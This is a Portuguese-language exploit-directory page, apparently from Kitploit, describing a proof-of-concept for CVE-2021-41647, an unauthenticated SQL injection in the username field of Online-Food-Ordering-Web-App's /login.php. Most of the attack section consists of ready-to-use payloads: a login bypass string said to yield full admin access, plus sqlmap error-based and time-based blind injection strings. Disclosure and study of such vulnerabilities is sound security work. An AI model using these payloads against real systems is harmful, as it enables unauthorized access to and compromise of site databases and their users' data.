Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2021-41647 — Exploit de prova de conceito para injeção SQL não autenticada no Online-Food-Ordering-Web-App, demonstrando técnicas de bypass de login e injeção cega baseada em erro/tempo. | Kitploit
Ferramentas/GitHubGitHub/mobiusbinary/cve-2021-41647
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoAprendizado e Educação
GitHubmobiusbinary/cve-2021-41647

CVE-2021-41647

Exploit de prova de conceito para injeção SQL não autenticada no Online-Food-Ordering-Web-App, demonstrando técnicas de bypass de login e injeção cega baseada em erro/tempo.

Ver Repositório
1há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2021-41647

CVE-2021-41647 Injeção SQL no Online-Food-Ordering-Web-App

O Online-Food-Ordering-Web-App é vulnerável a ataques de Injeção SQL não autenticados, baseados em erro e temporais cegos (time-based blind). O parâmetro username na página /login.php não sanitiza a entrada do usuário, permitindo que um invasor burle o login usando uma técnica simples de bypass.

Link para Aplicação

Online-Food-Ordering-Web-App

Componentes e Parâmetro Afetados

URL: /login.php
PARÂMETRO: username

PoCs

Payload de Bypass de Login

Para burlar o login do usuário e obter acesso administrativo total, insira o payload no campo de entrada username: user' or 1=1-- -

Payloads do SQLmap

Parâmetro: username (Requisição POST) Tipo: baseado em erro Título: MySQL >= 5.0 AND baseado em erro - cláusula WHERE, HAVING, ORDER BY ou GROUP BY (FLOOR)
Payload: username=test'||(SELECT 0x6d65686d WHERE 8694=8694 AND (SELECT 8639 FROM(SELECT COUNT(*),CONCAT(0x71626a7a71,(SELECT (ELT(8639=8639,1))),0x71766a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&password=asdfasdrf

Tipo: time-based blind Título: MySQL >= 5.0.12 AND time-based blind (consulta SLEEP)
Payload: username=test'||(SELECT 0x6d6d6367 WHERE 7580=7580 AND (SELECT 4416 FROM (SELECT(SLEEP(5)))nUhT))||'&password=asdfasdrf

Se a imagem da PoC não estiver clara, clique no GIF que será carregado em melhor resolução.

POC

Descoberto por

Jason Colyvas
MOBIUSBINARY
20 de Setembro de 2021

Baixar ferramenta